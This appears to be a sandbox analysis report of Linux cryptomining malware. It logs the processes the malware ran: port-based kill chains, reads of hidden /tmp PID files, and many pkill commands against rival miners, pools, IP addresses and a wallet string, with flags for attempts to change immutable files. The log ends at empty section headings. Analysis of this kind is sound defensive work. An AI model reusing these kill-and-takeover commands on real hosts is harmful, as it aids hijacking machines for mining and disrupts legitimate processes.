/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:994
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:995
/bin/grep | grep :3347 | 2⤵ | PID:993
/bin/grep | grep -v - | 2⤵ | PID:996
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:997 | [Attempts to change immutable files]
/bin/grep | grep :14444 | 2⤵ | PID:999
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:1000
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:1001
/bin/grep | grep -v - | 2⤵ | PID:1002
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1003
/bin/grep | grep :14433 | 2⤵ | PID:1005
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:1006
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:1007
/bin/grep | grep -v - | 2⤵ | PID:1008
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1009 | [Attempts to change immutable files]
/bin/grep | grep :13531 | 2⤵ | PID:1011
/usr/bin/awk | awk "{print \$7}" | 2⤵ | PID:1012
/usr/bin/awk | awk "-F[/]" "{print \$1}" | 2⤵ | PID:1013
/bin/grep | grep -v - | 2⤵ | PID:1014
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1015 | [Attempts to change immutable files]
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1017
/bin/cat | cat /tmp/.X11-unix/01 | 2⤵ | PID:1016
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1019 | [Attempts to change immutable files]
/bin/cat | cat /tmp/.X11-unix/11 | 2⤵ | PID:1018
/bin/cat | cat /tmp/.X11-unix/22 | 2⤵ | PID:1020
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1021
/bin/cat | cat /tmp/.systemd.1 | 2⤵ | PID:1022
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1023 | [Attempts to change immutable files]
/bin/cat | cat /tmp/.systemd.2 | 2⤵ | PID:1024
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1025
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1027 | [Attempts to change immutable files]
/bin/cat | cat /tmp/.systemd.3 | 2⤵ | PID:1026
/bin/cat | cat /tmp/.systemd.1 | 2⤵ | PID:1028
/bin/cat | cat /tmp/.systemd.2 | 2⤵ | PID:1029
/bin/cat | cat /tmp/.systemd.3 | 2⤵ | PID:1030
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1032 | [Attempts to change immutable files]
/bin/cat | cat /tmp/.pg_stat.0 | 2⤵ | PID:1031
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1034
/bin/cat | cat /tmp/.pg_stat.1 | 2⤵ | PID:1033
/usr/bin/xargs | xargs -I "%" kill -9 "%" | 2⤵ | PID:1036 | [Attempts to change immutable files]
/bin/cat | cat /data/./oka.pid | 2⤵ | PID:1035
- /usr/bin/pkill: pkill -f 80.211.206.105 (PID:1037)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f 207.38.87.6 (PID:1038)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f p8444 (PID:1039)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f supportxmr (PID:1040)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f monero (PID:1041)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f zsvc (PID:1042)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f pdefenderd (PID:1043)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f updatecheckerd (PID:1044)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f cruner (PID:1045)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f dbused (PID:1046)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f bashirc (PID:1047)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f meminitsrv (PID:1048)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f kthreaddi (PID:1049)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f srv00 (PID:1050)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/.javae/javae (PID:1051)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f .javae (PID:1052)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f .syna (PID:1053)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f .main (PID:1054)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f xmm (PID:1055)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f solr.sh (PID:1056)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f /tmp/.solr/solrd (PID:1057)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/javac (PID:1058)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/.go.sh (PID:1059)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/.x/agetty (PID:1060)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/.x/kworker (PID:1061)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f c3pool (PID:1062)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/.X11-unix/gitag-ssh (PID:1063)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/1 (PID:1064)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/okk.sh (PID:1065)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f /tmp/gitaly (PID:1066)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f /tmp/.x/kworker (PID:1067)
  - Reads CPU attributes
  - Reads runtime system information
- /usr/bin/pkill: pkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB (PID:1068)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f /tmp/.X11-unix/supervise (PID:1069)
  - Reads CPU attributes
- /usr/bin/pkill: pkill -f /tmp/.ssh/redis.sh (PID:1070)
  - Reads CPU attributes
  - Reads runtime system information
- /bin/ps: ps aux (PID:1071)
Network
MITRE ATT&CK Enterprise v6
Downloads